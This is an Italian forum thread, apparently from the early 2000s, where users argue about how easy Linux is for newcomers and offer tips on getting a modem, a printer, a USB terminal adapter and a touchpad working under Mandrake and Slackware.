            E leggere dei vostri commenti entusiasti
            ed

            inviti a cercare patchare ricompilare

            francemente mi fa pensare solo a patetici

            emuli di Wanna Marchi.
            Grazie per l'opinione ragionata, argomentata
            e civile.
            Vallo a dire ad IBM, Sun, HP, Pixar,
            DreamWorks, al governo tedesco, a quello
            cinese, a quello coreano e alla stessa
            Microsoft che sembra preoccupata della
            diffusione di Linux, al punto da fare
            pubblicità denigratorie...certo certo!ma io sono sc3mo ed incapace, come dichiaravo ina altro post, e finché il vostro amato linux non sarà a prova di patetiche nullità quale io sono, micocrozozz, o chi prenderà il suo posto, trionferà.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: toto63

            certo certo!
            ma io sono sc3mo ed incapace, come
            dichiaravo ina altro post, e finché il
            vostro amato linux non sarà a prova di
            patetiche nullità quale io sono,
            micocrozozz, o chi prenderà il suo posto,
            trionferà.E' proprio vero: ognuno al il SO che si merita.CiaoFabio
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: toto63
            ma io sono sc3mo ed incapace, come
            dichiaravo ina altro post, e finché il
            vostro amato linux non sarà a prova di
            patetiche nullità quale io sono,
            micocrozozz, o chi prenderà il suo posto,
            trionferà.Ripeto anche a te come ho fatto un paio di giorni fa su questi forum: se tu adesso ti senti (a ragione, per carità...) in diritto di dire che Linux deve funzionare anche per te che non ne capisci niente, è solo perché negli ultimi anni sono stati fatti passi ENORMI nel suo sviluppo e Linux è arrivato sempre più vicino a qualcosa che ti può essere utile. E' solo questione di tempo, Linux arriverà anche sul tuo PC, e DOMINERA' IL MONDO! AH AH AH! ;o) P.S: Red Hat 7.2: metto il CD, avvio il PC, faccio 5-6 click, vado a bermi un caffè, faccio due chiacchere e quando torno il mio sistema è pronto (l'ho fatto su almeno 10 macchine diverse).
          • Anonimo scrive:
            Re: Compro harware compatibili con
            Io ho installato una MDK 8.1 sul portatile della ragazza di mio fratello (che studia alla facoltà di Matematica di Firenze, dove usano praticamente tutti Linux) e l'installazione è andata a buon fine (nonostante non possa negare di aver incontrato problemi all'inizio).In definitva resto dell'opinione che la Mandrake sia una cattiva distribuzione, ma tentare di installare un slack su un portatile è pura follia...byezp.s. Già che ci siamo, qualcuno sa dirmi come installare un touchpad con la Slackware 8?
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: slack\b0y
            In definitva resto dell'opinione che la
            Mandrake sia una cattiva distribuzioneMah... diciamo che si adatta all'utenza che deve ricoprire, che poi è più power-user che altro...Resta il fatto che ti dà la possibilità di smantellarla per farci quello che ti pare, cosa che un win2k non ti dà... Io ne ho una che mi fa da dns interno, webserver e backup server.Per quello che deve fare va bene...
            tentare di installare un slack su un
            portatile è pura follia...???? che ha di diverso da qualsiasi altra distro????o che ha un portatile di diverso da un pc qualsiasi?ne ho una su un DirX proprio qui accanto, sulla scrivania... e certo non si può dire che il DirX sia un marchio universalmente supportato...
            p.s. Già che ci siamo, qualcuno sa dirmi
            come installare un touchpad con la Slackware
            8?E' visto paro paro ad un mouse ps/2 a 2 tasti... almeno il mio...
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: skull
            ???? che ha di diverso da qualsiasi altra
            distro????Niente, ci puoi fare esattamente le stesse cose. Pero` concedi almeno che configurare l'hardware con una slack e` piu` complicato.
            o che ha un portatile di diverso da un pc
            qualsiasi?Che ci sono le schede piu` assurde del mercato dentro (scheda audio incastonata sulla scheda madre che utilizza il monitor LCD per dissipare il calore e la scheda grafica che usa pezzi di scheda audio per far funzionare l'interfaccia PCIMCIA, per fare un esempio ;))Se funzionano su una Mdk funzioneranno anche su slack pero` devi faticare di piu`.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            sinceramente non mi stupisce che tu non riesca a farlo funzionare.... non riesci nemmeno a scrivere in italiano corretto... :))cià...
      • Anonimo scrive:
        Re: Compro harware compatibili con
        - Scritto da: qws
        ho appena installato mandrake 8.2 e' la mia
        prima volta con linux e con enorme
        dispiacere devo dire che non e' possibile
        utilizzare:

        il mio caro TA USB,Che modello? Si _dice_ che il supporto per USB e' migliorato nell'ultima Mandrake.
        il vecchio modem 56k,L'_unico_ caso in cui puoi avere problemi e' se hai un Winmodem. Se e' cosi', incrocia le dita e vai su http://www.linmodems.org/.
        la stampanteHu? Marca, modello, parallela o USB?
        tra l'altro il mouse (logitec optical wheel
        mouse)Avevo un Logitech optical e non mi dava alcun problema (del tutto trasparente).Non e' che devi "aggiustare" le proprieta' del mouse.
      • Anonimo scrive:
        Re: Compro harware compatibili con
        - Scritto da: qws
        ho appena installato mandrake 8.2 e' la mia
        prima volta con linux e con enormeSe e' la prima volta e' meglio che leggi un po' di documentazione.E' molto importante sapere quello che si sta facendo, ma anche il perche' di quello che si sta facendo.

        il mio caro TA USB,
        il vecchio modem 56k,http://www.ziobudda.net//hwil/
        la stampantehttp://www.linuxprinting.org/programmi e aggiornamentihttp://www.rpmfind.net/oppure un piccola ricerca tra i gruppi (newsgroups) su google.CiaoFabio
      • Anonimo scrive:
        Re: Compro harware compatibili con
        - Scritto da: qws
        ho appena installato mandrake 8.2 e' la mia
        prima volta con linux e con enorme
        dispiacere devo dire che non e' possibile
        utilizzare:

        il mio caro TA USB,Io lo uso, è impossibile o forse non sei capace tu? Non dico che sia facilissimo da installare eh....
        il vecchio modem 56k,winmodem? Ne ho visti funzionare molti,,,
        la stampanteCups ha un supporto praticamente completo....Ciao
Chiudi i commenti